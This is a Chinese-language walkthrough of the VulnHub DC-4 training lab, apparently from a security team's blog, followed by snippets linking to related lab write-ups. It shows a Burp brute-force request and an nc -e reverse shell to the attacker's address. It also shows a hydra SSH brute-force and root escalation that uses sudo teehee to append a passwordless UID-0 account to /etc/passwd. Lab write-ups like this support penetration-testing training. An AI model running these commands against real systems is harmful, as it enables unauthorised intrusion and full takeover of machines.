VulnHub通關日記-DC_4-Walkthrough

2022-01-01 Gcow安全團隊
VulnHub通關DC_4-Walkthrough靶機介紹

DC-4是另一個專門構建的易受攻擊的實驗室,目的是在滲透測試領域積累經驗。

與以前的DC版本不同,此版本主要為初學者/中級用戶設計。只有一個標誌,但是從技術上講,有多個入口點,就像上次一樣,沒有任何線索

靶機地址:https://www.vulnhub.com/entry/dc-4,313/

這邊靶機和前一個是一樣的,只需要獲取一個Flag就行了,在/root目錄下!

學習到的知識

Burpsuite枚舉弱密碼命令執行反彈shellhydra爆破ssh teehee權限提升

信息搜集

拿到IP先對它進行埠掃描:

nmap -A -T4 192.168.1.100

圖片

這邊掃描出來靶機開放了22(ssh),80(http)埠,先從80埠來入侵:

圖片Burpsuite枚舉弱密碼

:後發現是一個登陸的頁面,我嘗試了常規的弱口令admin,admin123無果,隨後我又嘗試了一遍SQL注入,並沒有注入點!這個時候就需要掏出我的字典來了來配合Burp爆破:

POST /login.php HTTP/1.1Host: 192.168.1.100User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.100/Content-Type: application/x-www-form-urlencodedContent-Length: 30Connection: closeCookie: PHPSESSID=lddqa4ven9a9qqf8ua9tlurj35Upgrade-Insecure-Requests: 1
username=admin&password=§123456§

burp枚舉弱密碼1burp枚舉弱密碼2

爆破成功後得到密碼happy,隨後攜帶帳號和密碼登陸到了後臺,在後臺發現可以執行查看文件的操作:

執行查看文件操作命令執行反彈shell

這個時候想到了命令執行,whoami看了看權限是一個網站普通權限:

whoami回顯

我們先用nc反彈一個shell回來把,kali監聽4444埠,在radio變量輸入nc反彈的地址成功反彈一枚shell:

nc -e /bin/sh 192.168.1.128 4444

反彈殼

我們先讓它得到一個bash把:

python -c 'import pty;pty.spawn("/bin/bash")'

hydra爆破ssh

之後我是在/home/jim目錄裡發現了一個歷史密碼的備份文件:

歷史密碼備份文件

既然得到了密碼,就那麼用九頭蛇來爆破把:

hydra -l jim -P pass ssh://192.168.1.100 -t 10

九頭蛇爆破

爆破成功後得到jim的密碼為jibril04,後來我登陸到了jim用戶:

ssh連結

登陸之後我習慣性的sudo -l發現需要密碼:

須藤-l回顯

緊接著我在jim的目錄下發現了一個文件,文件裡好像是一封郵件信息:

From root@dc-4 Sat Apr 06 20:20:04 2019Return-path: <root@dc-4>Envelope-to: jim@dc-4Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000Received: from root by dc-4 with local (Exim 4.89)        (envelope-from <root@dc-4>)        id 1hCiQe-0000gc-EC        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000To: jim@dc-4Subject: TestMIME-Version: 1.0Content-Type: text/plain; charset="UTF-8"Content-Transfer-Encoding: 8bitMessage-Id: <E1hCiQe-0000gc-EC@dc-4>From: root <root@dc-4>Date: Sat, 06 Apr 2019 20:20:04 +1000Status: RO
This is a test.

郵件信息

好像沒得啥子用處!最後我在郵箱目錄找到了另一封郵件:

另一篇郵件信息

讀完這封郵件我得到了charles告訴jim的一個重要信息,也就是charles的密碼!

獲取到密碼後我切換到了charles用戶:

切換charles用戶teehee權限提升

切換用戶之後我又是習慣性的sudo -l發現charles用戶可以以root身份去運行teehee命令:

用root身份身份運性teehee命令

我緊接著寫入了一個帳號saul到passwd裡:

echo "saul::0:0:::/bin/bash" | sudo teehee -a /etc/passwd#注釋:#[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登錄shell]

寫入passwd拿到標誌

最後也是在/root目錄下拿到了Flag〜

往期連結:

VulnHub通關日記-DC_1-Walkthrough

VulnHub通關日記-DC_2-Walkthrough

VulnHub通關日記-DC_3-Walkthrough

相關焦點

  • DC-1靶機通關記錄
    一、靶機搭建官網連結:https://download.vulnhub.com/dc/靶機下載地址:http://www.five86
  • Vulnhub靶機DC系列-DC4
    jim@192.168.44.136's password:Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686The programs included with the Debian GNU/Linux system are free software;
  • Vulnhub-DC-2靶場
    發現URL欄寫的不是靶機的ip,而是http://dc-2/,而很明顯,DNS沒有解析出來 修改hosts文件:vim /etc/hosts 使用wpscan進行帳戶掃描wpscan換一種用法,列出站點的用戶名、帳號 wpscan --url dc
  • dc-9滲透測試記錄
    靶機來源:https://www.vulnhub.com/entry/dc-9,412/滲透準備:kali-linux
  • 小眾又好聽的《Through the Fight》,超治癒
    當戰鬥發生stick your gun you'll never fall down端起你的槍 絕不認輸and try again till you get it right再試一次 直至成功No matter whether you win or lose無論輸贏just know you made it through
  • 打靶系列之DC-6
    01 項目安裝先把DC-6的靶機安裝到本地下載地址是:https://www.five86.com/dc
  • 【Vulnhub靶機系列】|1-實戰中如何運用msf攻擊CMS、find命令提權、破解管理員密碼
    vulnhub
  • 當vulnhub邂逅百香果沙盤後...
    vulnhub官方地址:https://www.vulnhub.com/不少小夥伴可能對vulnhub還是很了解,這裡鬥哥簡單介紹一下,vulnhub是免費開放的平臺,平臺上提供了各種各樣的漏洞靶機供大家下載到本地學習,主要有兩種類型的靶機:boot2root靶機和CTF靶機,該社區的宗旨是希望提供的靶機可以幫助任何人在安全、計算機軟體和網絡管理方面獲得「
  • DC中常用到的命令(示例)總結
    3、tcl語法的檢查當在DC可以執行tcl文件,在運行之前,我們要檢查這個tcl文件是否有語法錯誤,可以使用下面的命令:      $dcprocheck   xxx.tcl 4、設計對象的操作關於設計對象的內容(比如上面是設計對象等),請查看前面的章節
  • Vulnhub 靶機實戰系列:DC -1
    下載地址:https://www.five86.com/dc-1.html我們用netdiscover -r 192.168.188.0/24 掃描ip,得到靶機ip 192.168.188.156則靶機DC-1 ip:192.168.188.156攻擊機kalilinux ip:192.168.188.144
  • python管理文件神器 os.walk
    其實是可以的,因為python已經為你準備好了神器os.walk,進來看看吧!python中os.walk是一個簡單易用的文件、目錄遍歷器,可以幫助我們高效的處理文件、目錄方面的事情。本文將詳細介紹os.walk模塊,最後使用os.walk模塊實現一個在指定日誌整理文件的程序。
  • Python管理文件神器 os.walk
    其實是可以的,因為Python已經為你準備好了神器os.walk,進來看看吧!Python中os.walk是一個簡單易用的文件、目錄遍歷器,可以幫助我們高效的處理文件、目錄方面的事情。本文將詳細介紹os.walk模塊,最後使用os.walk模塊實現一個在指定日誌整理文件的程序。
  • VulnHub之ShellDredd-1-Hannah
    虛擬機信息:虛擬機下載地址:https://www.vulnhub.com
  • 萌新教程丨VulnHubDC系列之DC1靶機滲透測試
    https://www.vulnhub.com/entry/dc-1,292/靶機:DC1 (VirtualBox)       IP:192.168.1.13攻擊機:Kali(VMware )        IP:192.168.1.10特別說明:每個靶機作者都對靶機做了詳細的描述以及攻擊目標,比如DC1就需要找到5個flag,最終目標是在
  • vulnhub綜合靶場:MyExpense: 1
    靶機環境:官網地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/靶機安裝過程:1)下載得到對應的ova文件2.在VMware中打開,導入,選擇導入位置即可。
  • Vulnhub靶場攻略:CENGBOX: 3
    環境搭建1、官網下載連接:https://www.vulnhub.com/entry/cengbox-3,576/2、下載之後,使用Oracle VM VirtualBox導入靶場環境3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可靶場攻略
  • vulnhub系列之靶機Hackademic.RTB1練習
    靶機下載地址https://www.vulnhub.com/entry/hackademic-rtb1,17/1、nmap -sn
  • Vulnhub靶機Five86-2詳細解析
    上篇指路-Vulnhub靶機Five86-1詳細解析靶機地址:http://www.vulnhub.com/entry/five86-2,418/ 技術點總結 •對WordPress網站的滲透 –wpscan •WordPress中IEAC插件的RCE漏洞 –WordPress
  • 大話DC之setup time與hold time
    dc的所有時序約束基礎差不多就是setuptime 和 hold time。 可以用下面的圖片說明:所謂setup time即建立時間,也就說數據在時鐘到來之前保持穩定所需要的時間,holdtime 即保持時間,也就是說在時鐘到來之後數據需要保持穩定的時間。在深入建立時間和保持時間之前。先了解下dc中的路經以及startpoint  ,end point。